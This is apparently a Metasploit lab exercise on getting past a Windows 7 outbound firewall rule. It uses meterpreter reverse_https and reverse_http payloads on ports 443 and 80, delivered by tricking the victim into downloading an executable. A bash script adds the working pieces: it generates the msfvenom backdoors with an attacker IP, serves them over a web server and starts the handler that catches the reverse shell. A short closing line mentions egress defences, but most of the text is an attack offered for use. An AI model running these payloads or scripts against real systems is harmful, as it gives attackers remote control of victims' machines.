WINDOWS 7 - REVERSE SHELL HTTPS / HTTP
- Layout of this exercise:
- In the previous exercise, an OUTBOUND rule was created in Windows Firewall with Advanced Security to block reverse shell connections to remote port TCP 4444, the port Metasploit uses by default:
- However, this rule does not block OUTBOUND connections to any other remote port, for instance port 443 (HTTPS) or port 80 (HTTP).
- In the next two exercises, let's see how backdoors can be installed on the victim machine, bypassing that firewall rule, by using social engineering so that the victim downloads and runs executable files from the attacker's web page.
REVERSE_HTTPS.exe
- Let's create the executable reverse_https.exe using msfvenom and the meterpreter reverse_https payload:
- Checking that the output is an executable file for Windows:
- The attacker opens a web server on port 8000:
- Also, on Kali the attacker sets up a handler (exploit/multi/handler) with local port 443 (HTTPS) and the local IP, waiting for the victim to connect back:
- Then, the Windows 7 victim connects to the web server, downloads and runs the executable reverse_https.exe:
- A meterpreter session is opened automatically on the attacker's console, and the post-exploitation process can start:
REVERSE_HTTP.exe
- The same goal can be achieved with the HTTP protocol. The attacker creates the binary reverse_http.exe with msfvenom. In this case the LPORT is 80 (HTTP), and the local IP is the attacker's machine:
- The file is an executable for Microsoft Windows:
- A web server is set up by the attacker:
- Also, a handler waits until the client connects and runs the binary:
- The Windows 7 victim downloads and runs reverse_http.exe:
- A meterpreter session is obtained automatically on the attacker's machine:
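The two procedures above (reverse_https.exe caught on port 443, reverse_http.exe caught on port 80) differ only in the payload name and LPORT. The bash script below is an added example, not part of the original exercise or of the Metasploit project: it builds the msfvenom command for either scheme, checks that the result carries the "MZ" magic of a Windows PE (the property the `file` check in the exercise confirms), serves the binary and starts the matching handler. The attacker IP 192.168.1.10, the use of `python3 -m http.server` for the port-8000 web server, and the `-j` backgrounding of the handler are assumptions, not taken from the page.

```bash
#!/usr/bin/env bash
# Added example (not from the original exercise): generate the msfvenom payload for
# either scheme, verify it is a Windows PE, stage it over HTTP and catch it with
# exploit/multi/handler. LHOST and the python3 web server are assumptions.
set -euo pipefail

LHOST="${LHOST:-192.168.1.10}"   # attacker (Kali) IP, assumed value
WEBPORT="${WEBPORT:-8000}"       # port of the staging web server, as in the exercise

# Map the scheme to the listener port the victim's egress rule still allows:
# 443 for reverse_https, 80 for reverse_http. Anything else is rejected.
lport_for() {
    case "$1" in
        https) echo 443 ;;
        http)  echo 80 ;;
        *) echo "unknown scheme: $1" >&2; return 1 ;;
    esac
}

# Print the msfvenom command that builds reverse_<scheme>.exe.
venom_cmd() {
    local scheme="$1" lport
    lport="$(lport_for "$scheme")" || return 1
    printf 'msfvenom -p windows/meterpreter/reverse_%s LHOST=%s LPORT=%s -f exe -o reverse_%s.exe\n' \
        "$scheme" "$LHOST" "$lport" "$scheme"
}

# Print the msfconsole one-liner that starts the matching handler (-j keeps it in
# the background so the web server and the handler can share one terminal).
handler_cmd() {
    local scheme="$1" lport
    lport="$(lport_for "$scheme")" || return 1
    printf 'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_%s; set LHOST %s; set LPORT %s; exploit -j"\n' \
        "$scheme" "$LHOST" "$lport"
}

# The check behind `file reverse_https.exe`: a Windows PE starts with the DOS
# magic "MZ". Returns 0 if the file has it, 1 otherwise (or if it is missing).
is_pe() {
    [ "$(head -c 2 "$1" 2>/dev/null)" = "MZ" ]
}

# The whole procedure for one scheme; needs Metasploit and python3 on the box.
run_exercise() {
    local scheme="$1"
    eval "$(venom_cmd "$scheme")"
    is_pe "reverse_${scheme}.exe" || { echo "reverse_${scheme}.exe is not a PE" >&2; return 1; }
    # Serve the working directory; the victim fetches http://LHOST:WEBPORT/reverse_<scheme>.exe
    python3 -m http.server "$WEBPORT" &
    eval "$(handler_cmd "$scheme")"
}

# Usage: bash reverse_shell_exercise.sh run https|http  (only runs where msfvenom exists)
if [ "${1:-}" = "run" ] && command -v msfvenom >/dev/null 2>&1; then
    run_exercise "${2:-https}"
fi
```

Run it as `bash reverse_shell_exercise.sh run https` (or `run http`) on the Kali box; on any other host the helper functions can still be sourced and exercised, since they only build the command strings. Note that the bypass works only because the egress rule is a single port block: a default-deny outbound policy, or an egress proxy that terminates TLS, would stop the reverse_https callback just as it stops 4444.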